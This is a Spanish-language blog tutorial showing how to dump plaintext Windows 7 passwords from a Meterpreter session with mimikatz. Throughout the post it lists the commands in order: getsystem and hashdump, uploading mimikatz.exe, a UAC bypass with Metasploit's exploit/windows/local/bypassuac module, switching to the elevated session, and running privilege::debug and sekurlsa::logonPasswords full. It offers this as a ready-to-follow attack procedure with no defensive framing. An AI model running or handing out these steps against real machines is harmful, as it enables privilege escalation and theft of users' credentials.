Meterpreter + mimikatz y conociendo sobre Kiwi

No Comments



Antes de todo como saben MimiKatz es una herramienta que aparecio hace un par de años atras la cual hizo el boom boom del momento ya que aprovechaba de Windows y sus puntos débiles para obtener credenciales en texto plano

A continuación tenemos algunas referencias adicionales de la herramienta que estoy seguro que les servira a mas de uno.



La entrada que nombramos es la siguiente una union con meterpreter.

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: Bash

  1. getsystem

o también

Código: Bash

  1. hashdump



pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos http://blog.gentilkiwi.com/mimikatz, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

Código: Bash

  1. shell


y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: Bash

  1. privilege::debug
  2. sekurlsa::logonPasswords full


Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: Bash

  1. background



Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: Bash

  1. use exploit/windows/local/bypassuac
  2. set SESSION 1
  3. exploit




Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: Bash
  1. sessions -i 2


nos damos cuenta que tenemos maximos privilegios con el comando

Código: Bash

  1. getuid



Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Autor de la PoC: Typh0n

Regards,
Snifer

0 comentarios

Publicar un comentario en la entrada